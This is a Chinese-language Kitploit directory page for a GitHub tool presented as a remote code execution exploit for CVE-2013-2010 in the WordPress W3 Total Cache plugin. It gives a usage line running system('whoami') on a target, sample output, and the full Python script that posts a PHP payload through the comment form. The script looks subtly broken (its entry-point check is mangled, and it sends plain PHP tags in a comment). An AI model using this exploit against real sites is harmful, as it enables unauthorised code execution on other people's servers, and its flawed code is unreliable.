Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
w3-total-cache-cve-2013-2010 — 在 w3 total cache cve 2013-2010 上运行的远程代码执行 | Kitploit
工具/GitHubGitHub/spyata123/w3-total-cache-cve-2013-2010
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubspyata123/w3-total-cache-cve-2013-2010

w3-total-cache-cve-2013-2010

在 w3 total cache cve 2013-2010 上运行的远程代码执行

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
11年前尚未审核

w3-total-cache-cve-2013-2010

针对 w3 total cache cve 2013-2010 的远程代码执行漏洞利用

用法: python3 w3tc_rce_exploit.py -u http://example.com -p "system('whoami');"

输出: [*] 目标:http://example.com [+] 负载已成功发送。 [+] 请检查目标是否执行了负载。


import requests import argparse

def exploit_rce(target_url, payload): """Exploit the RCE vulnerability by sending a crafted comment.""" # Construct the URL for posting a comment post_url = f"{target_url}/wp-comments-post.php"

# Prepare the payload for the comment
data = {
    'author': 'attacker',
    'email': '[email protected]',
    'url': 'http://example.com',
    'comment': payload,
    'submit': 'Submit Comment',
    'post_id': 1  # Assuming post ID 1 exists; adjust as necessary
}

try:
    # Send the POST request
    response = requests.post(post_url, data=data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the target for execution of the payload.")
    else:
        print("[-] Failed to send payload.")
        print(f"Status Code: {response.status_code}")

except Exception as e:
    print(f"Error during exploitation: {str(e)}")

def main(): parser = argparse.ArgumentParser(description='Exploit CVE-2013-2010 in W3 Total Cache') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-p', '--payload', required=True, help='PHP code to execute')

args = parser.parse_args()

target_url = args.url.rstrip('/')

# Construct a malicious payload (e.g., a simple PHP command)
php_payload = f"<?php {args.payload} ?>"

print(f"[*] Targeting: {target_url}")

exploit_rce(target_url, php_payload)

if name == "main": main()

下载工具